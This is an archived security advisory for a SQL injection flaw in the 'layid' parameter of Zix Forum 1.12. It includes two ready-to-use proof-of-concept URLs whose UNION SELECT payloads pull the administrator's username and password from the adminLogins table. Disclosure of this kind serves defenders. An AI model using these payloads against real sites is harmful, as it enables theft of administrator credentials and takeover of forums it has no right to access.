TUCoPS :: Web BBS :: etc :: b06-2338.htm

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Zix Forum <= 1.12 (layid) SQL Injection Vulnerability=0D
=0D
=0D
Vulnerability:=0D
--------------------=0D
SQL_Injection:=0D
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.=0D
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.=0D
Successful exploitation extracts username and password of administrator in clear text .=0D
=0D
=0D
Proof of Concepts:=0D
--------------------=0D
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'=0D
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'=0D
=0D
-------=0D
=0D
By PHP Emperor=0D
=0D
# i6d[at]hotmail[dot]com=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH